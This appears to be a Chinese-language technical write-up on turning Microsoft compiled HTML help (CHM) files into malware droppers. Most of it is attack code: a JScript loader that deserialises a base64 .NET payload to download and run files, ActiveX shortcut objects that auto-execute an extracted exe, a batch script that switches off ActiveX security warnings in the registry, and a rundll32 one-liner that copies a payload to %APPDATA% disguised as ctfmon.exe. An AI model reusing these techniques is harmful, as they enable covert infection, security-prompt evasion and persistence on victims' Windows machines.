微软HTML帮助集,即编译的HTML帮助文件(英语:Microsoft Compiled HTML Help, CHM),是微软继承早先的WinHelp发展的一种文件格式,用来提供在线帮助,是一种应用较广泛的文件格式。因为CHM文件如一本书一样,可以提供内容目录、索引和搜索等功能。CHM帮助文件通常可以使用RAR等压缩文件格式打开。
[OPTIONS] Compatibility=1.1 or later Compiled file=PocCalc.chm Contents file=Table of Contents.hhc Index file=Index.hhk Default topic=poc.html Title=PocCalc Display compile progress=No Language=0x410 Italian (Italy) Full-text search=Yes
function setversion() { new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v2.0.50727'; }
function base64ToStream(b) { var enc = new ActiveXObject("System.Text.ASCIIEncoding"); var length = enc.GetByteCount_2(b); var ba = enc.GetBytes_4(b); var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform"); ba = transform.TransformFinalBlock(ba, 0, length); var ms = new ActiveXObject("System.IO.MemoryStream"); ms.Write(ba, 0, (length / 4) * 3); ms.Position = 0; return ms; }
//(此处省略了部分。) var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+ "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+ "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+ "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+ "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+ "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+ "AAAAAAAAAAAAAAAAAQ0AAAAEAAAACRcAAAAJBgAAAAkWAAAABhoAAAAnU3lzdGVtLlJlZmxlY3Rp"+ "b24uQXNzZW1ibHkgTG9hZChCeXRlW10pCAAAAAoL"; var entry_class = 'TestClass';
try { setversion(); var stm = base64ToStream(serialized_obj); var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter'); var al = new ActiveXObject('System.Collections.ArrayList'); var d = fmt.Deserialize_2(stm); al.Add(undefined); var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class); o.Cp(path, execuablePath, downloadPath); invokeSuccess = true; } catch (e) { debug(e.message); } return invokeSuccess; } var href = "";
<pid="t0">Hello World!</p> <SCRIPT> <!-->获取目录<--> function getPath(){ var pathName = document.location.pathname; var index0 = pathName.substr(1).indexOf(":"); var index1 = pathName.substr(1).lastIndexOf(":"); var result = pathName.substr(index0+2,index1-index0-2); return result; } <!-->判断文件是否存在,存在就执行指定的文件。<--> function isHasFile(){ var a,s='C:\\Windows\\Temp\\Downloads\\Test7Z1.exe'; a = new ActiveXObject("Scripting.FileSystemObject"); if(a.FileExists(s)) AUTO.Click(); } var dir = getPath(); var commodStr = '<OBJECTid=unrarclassid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"width=1height=1>' + '<PARAMname="Command"value="ShortCut">' + '<PARAMname="Button"value="Bitmap::shortcut">' + '<PARAMname="Item1"value=",hh, -decompile C:\\Windows\\Temp\\Downloads\\ ' + dir + '"></OBJECT><OBJECTid=AUTOclassid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"width=1height=1><PARAMname="Command"value="ShortCut"><PARAMname="Button"value="Bitmap::shortcut"><PARAMname="Item1"value=",C:\\Windows\\Temp\\Downloads\\Test7Z1.exe"><PARAMname="Item2"value="273,1,1"></OBJECT>'; document.getElementById('t0').innerHTML = commodStr; unrar.Click(); isHasFile(); </SCRIPT>
ActiveXObject
缺点,会提示是否运行ActiveXObject运行警告,但是可以通过修改注册表去关闭警告。
1 2 3 4 5 6 7 8 9 10 11 12
<html> <scripttype="text/vbscript"> Functiontest() Dim oShell Set oShell = CreateObject("WSCript.shell") oShell.run"cmd /c calc" Set oShell = Nothing EndFunction test() </script>
</html>
注册表关闭ActiveXObject提示的Bat脚本
执行该bat脚本将会关闭文件包含ActiveXObject脚本的警告。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
echo off
cls set bl=0 :setreg if"%bl%"=="5"goto ex
set regpath=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%bl% cls
<PARAMname="Item1"value=',rundll32.exe,vbscript:"\..\mshtml,,,RunHTMLApplication "<br>execute("Set fso=CreateObject(""Scripting.FileSystemobject""):appdata=(CreateObject(""Wscript.Shell"")).ExpandEnvironmentstrings(""%APPDATA%"")&""\ctfmon.exe"":Set fc=fso.GetFolder(fso.GetSpecialFolder(2)).files:For Each f1 in fc:If f1.size=7168 then : fso.CopyFile f1, appdata:Exit For:End If:Next:window.close()")'>
<PARAMname="Item1"value=',rundll32.exe,vbscript:"\..\mshtml,,,RunHTMLApplication "<br>execute("Set fso=CreateObject(""Scripting.FileSystemobject""):appdata=(CreateObject(""Wscript.Shell"")).ExpandEnvironmentstrings(""%APPDATA%"")&""\ctfmon.exe"":Set fc=fso.GetFolder(fso.GetSpecialFolder(2)).files:For Each f1 in fc:If f1.size=7168 then : fso.CopyFile f1, appdata:Exit For:End If:Next:window.close()")'>